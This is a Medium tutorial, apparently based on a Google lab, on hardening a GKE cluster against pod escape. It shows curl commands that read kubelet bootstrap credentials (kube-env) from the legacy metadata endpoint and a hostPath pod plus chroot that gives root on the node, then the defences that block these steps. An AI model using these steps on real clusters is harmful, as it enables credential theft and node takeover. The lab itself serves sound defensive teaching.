CODEX

How to prevent multiple paths of Kubernetes pod escape

Ryle Zhou
Ryle Zhou
Feb 20 · 10 min read

This tutorial demonstrates some of the security concerns of a default GKE cluster configuration and the corresponding hardening measures to prevent multiple paths of pod escape and cluster privilege escalation. These attack paths are relevant in the following scenarios:

  1. An application flaw in an external facing pod that allows for Server-Side Request Forgery (SSRF) attacks.
  2. A fully compromised container inside a pod allowing for Remote Command Execution (RCE).
  3. A malicious internal user or an attacker with a set of compromised internal user credentials with the ability to create/update a pod in a given namespace.

This lab was created by GKE Helmsman engineers to help you grasp a better understanding of hardening default GKE cluster configurations.

The example code for this lab is provided as-is without warranty or guarantee*

Create a simple GKE cluster

export MY_ZONE=us-central1-a

Run this to start a Kubernetes cluster managed by Kubernetes Engine named simplecluster and configure it to run 2 nodes:

gcloud container clusters create simplecluster --zone $MY_ZONE --num-nodes 2 --metadata=disable-legacy-endpoints=false

It takes several minutes to create a cluster as Kubernetes Engine provisions virtual machines for you. The warnings about features available in new versions can be safely ignored for this lab.

After the cluster is created, check your installed version of Kubernetes using the kubectl version command:

kubectl version

The gcloud container clusters create command automatically authenticated kubectl for you.

View your running nodes in the Cloud Console. On the Navigation menu, click Compute Engine > VM Instances.

Your Kubernetes cluster is now ready for use.

Run a Google Cloud-SDK pod

kubectl run -it --rm gcloud --image=google/cloud-sdk:latest --restart=Never -- bash

This will take a few minutes to complete.

You should now have a bash shell inside the pod’s container:

root@gcloud:/#

Explore the Legacy Compute Metadata Endpoint

Run the following command to access the “Legacy” Compute Metadata endpoint without requiring a custom HTTP header to get the Compute Engine Instance name where this pod is running:

curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/name

Now, re-run the same command, but instead use the v1 Compute Metadata endpoint:

curl -s http://metadata.google.internal/computeMetadata/v1/instance/name

Notice how it returns an error stating that it requires the custom HTTP header to be present. Add the custom header on the next run and retrieve the Compute Engine instance name that is running this pod:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/name

Without requiring a custom HTTP header when accessing the Compute Engine Instance Metadata endpoint, a flaw in an application that allows an attacker to trick the code into retrieving the contents of an attacker-specified web URL could provide a simple method for enumeration and potential credential exfiltration. By requiring a custom HTTP header, the attacker needs to exploit an application flaw that allows them to control the URL and also add custom headers in order to carry out this attack successfully.

Keep this shell inside the pod available for the next step. If you accidentally exit from the pod, simply re-run:

kubectl run -it --rm gcloud --image=google/cloud-sdk:latest --restart=Never -- bash

Explore the GKE node bootstrapping credentials

curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/

Perhaps the most sensitive data in this listing is kube-env. It contains several variables which the kubelet uses as initial credentials when attaching the node to the GKE cluster. The variables CA_CERT, KUBELET_CERT, and KUBELET_KEY contain this information and are therefore considered sensitive to non-cluster administrators.

To see the potentially sensitive variables and data, run the following command:

curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env

Therefore, in any of the following situations:

  1. A flaw that allows for SSRF in a pod application
  2. An application or library flaw that allow for RCE in a pod
  3. An internal user with the ability to create or exec into a pod

There exists a high likelihood for compromise and exfiltration of sensitive kubelet bootstrapping credentials via the Compute Metadata endpoint. With the kubelet credentials, it is possible to leverage them in certain circumstances to escalate privileges to that of cluster-admin and therefore have full control of the GKE Cluster including all data, applications, and access to the underlying nodes.

Leverage the Permissions Assigned to this Node Pool’s Service Account

Run the following curl command to list the OAuth scopes associated with the service account attached to the underlying Compute Engine instance:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes

The combination of authentication scopes and the permissions of the service account dictates what applications on this node can access. The above list is the minimum scopes needed for most GKE clusters, but some use cases require increased scopes.

If the authentication scope were to be configured during cluster creation to include https://www.googleapis.com/auth/cloud-platform, this would allow any Google Cloud API to be considered "in scope", and only the IAM permissions assigned to the service account would determine what can be accessed. If the default service account is in use and the default IAM Role of Editor was not modified, this effectively means that any pod on this node pool has Editor permissions to the Google Cloud project where the GKE cluster is deployed. As the Editor IAM Role has a wide range of read/write permissions to interact with resources in the project such as Compute instances, Cloud Storage buckets, GCR registries, and more, this is most likely not desired.

Exit out of this pod by typing:

exit

Deploy a pod that mounts the host filesystem

To demonstrate this, run the following to create a Pod that mounts the underlying host filesystem / at the folder named /rootfs inside the container:

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: hostpath
spec:
containers:
- name: hostpath
image: google/cloud-sdk:latest
command: ["/bin/bash"]
args: ["-c", "tail -f /dev/null"]
volumeMounts:
- mountPath: /rootfs
name: rootfs
volumes:
- name: rootfs
hostPath:
path: /
EOF

Run kubectl get pod and re-run until it's in the "Running" state:

kubectl get pod
content_copy

(Output)

NAME       READY   STATUS    RESTARTS   AGE
hostpath 1/1 Running 0 30s

Explore and compromise the underlying host

kubectl exec -it hostpath -- bash
content_copy

Switch to the pod shell’s root filesystem point to that of the underlying host:

chroot /rootfs /bin/bash

Nearly every operation that the root user can perform is available to this pod shell. This includes persistence mechanisms like adding SSH users/keys, running privileged docker containers on the host outside the view of Kubernetes, and much more.

To exit the pod shell, run exit twice - once to leave the chroot and another to leave the pod's shell:

exitexit

Now you can delete the hostpath pod:

kubectl delete pod hostpath

Understand the available controls

  • Disabling the Legacy Compute Engine Metadata API Endpoint — By specifying a custom metadata key and value, the v1beta1 metadata endpoint will no longer be available from the instance.
  • Enable Metadata Concealment — Passing an additional configuration during cluster and/or node pool creation, a lightweight proxy will be installed on each node that proxies all requests to the Metadata API and prevents access to sensitive endpoints.
  • Enable and configure PodSecurityPolicy — Configuring this option on a GKE cluster will add the PodSecurityPolicy Admission Controller which can be used to restrict the use of insecure settings during Pod creation. In this demo’s case, preventing containers from running as the root user and having the ability to mount the underlying host filesystem.

Deploy a second node pool

Note: In GKE versions 1.12 and newer, the --metadata=disable-legacy-endpoints=true setting will automatically be enabled. The next command is defining it explicitly for clarity.

Create the second node pool:

gcloud beta container node-pools create second-pool --cluster=simplecluster --zone=$MY_ZONE --num-nodes=1 --metadata=disable-legacy-endpoints=true --workload-metadata-from-node=SECURE

Run a Google Cloud-SDK pod

kubectl run -it --rm gcloud --image=google/cloud-sdk:latest --restart=Never --overrides='{ "apiVersion": "v1", "spec": { "securityContext": { "runAsUser": 65534, "fsGroup": 65534 }, "nodeSelector": { "cloud.google.com/gke-nodepool": "second-pool" } } }' -- bash

You should now have a bash shell inside the pod’s container running on the node pool named second-pool. You should see the following:

nobody@gcloud:/$

It may take a few seconds for the container to be started and the command prompt to be displayed.

If you don’t see a command prompt, try pressing enter.

Explore various blocked endpoints

curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/name

(Output)

...snip...
Legacy metadata endpoints are disabled. Please use the /v1/ endpoint.
...snip...

With the configuration of the second node pool set to --workload-metadata-from-node=SECURE , the following command to retrieve the sensitive file, kube-env, will now fail:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env

(Output)

This metadata endpoint is concealed.

But other commands to non-sensitive endpoints will still succeed if the proper HTTP header is passed:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/name

(Example Output)

gke-simplecluster-second-pool-8fbd68c5-gzzp

Exit out of the pod:

exit

You should now be back in Cloud Shell.

Deploy PodSecurityPolicy objects

kubectl create clusterrolebinding clusteradmin --clusterrole=cluster-admin --user="$(gcloud config list account --format 'value(core.account)')"

(Output)

clusterrolebinding.rbac.authorization.k8s.io/clusteradmin created

Next, deploy a more restrictive PodSecurityPolicy on all authenticated users in the default namespace:

cat <<EOF | kubectl apply -f -
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
name: restrictive-psp
annotations:
seccomp.security.alpha.kubernetes.io/allowedProfileNames: 'docker/default'
apparmor.security.beta.kubernetes.io/allowedProfileNames: 'runtime/default'
seccomp.security.alpha.kubernetes.io/defaultProfileName: 'docker/default'
apparmor.security.beta.kubernetes.io/defaultProfileName: 'runtime/default'
spec:
privileged: false
# Required to prevent escalations to root.
allowPrivilegeEscalation: false
# This is redundant with non-root + disallow privilege escalation,
# but we can provide it for defense in depth.
requiredDropCapabilities:
- ALL
# Allow core volume types.
volumes:
- 'configMap'
- 'emptyDir'
- 'projected'
- 'secret'
- 'downwardAPI'
# Assume that persistentVolumes set up by the cluster admin are safe to use.
- 'persistentVolumeClaim'
hostNetwork: false
hostIPC: false
hostPID: false
runAsUser:
# Require the container to run without root privileges.
rule: 'MustRunAsNonRoot'
seLinux:
# This policy assumes the nodes are using AppArmor rather than SELinux.
rule: 'RunAsAny'
supplementalGroups:
rule: 'MustRunAs'
ranges:
# Forbid adding the root group.
- min: 1
max: 65535
fsGroup:
rule: 'MustRunAs'
ranges:
# Forbid adding the root group.
- min: 1
max: 65535
EOF

(Output)

podsecuritypolicy.extensions/restrictive-psp created

Next, add the ClusterRole that provides the necessary ability to "use" this PodSecurityPolicy.

cat <<EOF | kubectl apply -f -
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: restrictive-psp
rules:
- apiGroups:
- extensions
resources:
- podsecuritypolicies
resourceNames:
- restrictive-psp
verbs:
- use
EOF

(Output)

clusterrole.rbac.authorization.k8s.io/restrictive-psp created

Finally, create a RoleBinding in the default namespace that allows any authenticated user permission to leverage the PodSecurityPolicy.

cat <<EOF | kubectl apply -f -
---
# All service accounts in kube-system
# can 'use' the 'permissive-psp' PSP
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: restrictive-psp
namespace: default
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: restrictive-psp
subjects:
- apiGroup: rbac.authorization.k8s.io
kind: Group
name: system:authenticated
EOF

(Output)

rolebinding.rbac.authorization.k8s.io/restrictive-psp created

Note: In a real environment, consider replacing the system:authenticated user in the RoleBinding with the specific user or service accounts that you want to have the ability to create pods in the default namespace.

Enable PodSecurity policy

gcloud beta container clusters update simplecluster --zone $MY_ZONE --enable-pod-security-policy

Deploy a blocked pod that mounts the host filesystem

To do this, run:

gcloud iam service-accounts create demo-developer

(Output)

Created service account [demo-developer].

Next, run these commands to grant these permissions to the service account — the ability to interact with the cluster and attempt to create pods:

MYPROJECT=$(gcloud config list --format 'value(core.project)')
content_copy
gcloud projects add-iam-policy-binding "${MYPROJECT}" --role=roles/container.developer --member="serviceAccount:demo-developer@${MYPROJECT}.iam.gserviceaccount.com"

Obtain the service account credentials file by running:

gcloud iam service-accounts keys create key.json --iam-account "demo-developer@${MYPROJECT}.iam.gserviceaccount.com"

Configure kubectl to authenticate as this service account:

gcloud auth activate-service-account --key-file=key.json

To configure kubectl to use these credentials when communicating with the cluster, run:

gcloud container clusters get-credentials simplecluster --zone $MY_ZONE

Now, try to create another pod that mounts the underlying host filesystem / at the folder named /rootfs inside the container:

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: hostpath
spec:
containers:
- name: hostpath
image: google/cloud-sdk:latest
command: ["/bin/bash"]
args: ["-c", "tail -f /dev/null"]
volumeMounts:
- mountPath: /rootfs
name: rootfs
volumes:
- name: rootfs
hostPath:
path: /
EOF

This output validatates that it’s blocked by PSP:

Error from server (Forbidden): error when creating "STDIN": pods "hostpath" is forbidden: unable to validate against any pod security policy: [spec.volumes[0]: Invalid value: "hostPath": hostPath volumes are not allowed to be used]

Deploy another pod that meets the criteria of the restrictive-psp:

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: hostpath
spec:
securityContext:
runAsUser: 1000
fsGroup: 2000
containers:
- name: hostpath
image: google/cloud-sdk:latest
command: ["/bin/bash"]
args: ["-c", "tail -f /dev/null"]
EOF

(Output)

pod/hostpath created

To view the annotation that gets added to the pod indicating which PodSecurityPolicy authorized the creation, run:

kubectl get pod hostpath -o=jsonpath="{ .metadata.annotations.kubernetes\.io/psp }"

(Output appended to the Cloud Shell command line)

restrictive-psp

CodeX

Everything connected with Tech & Code

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store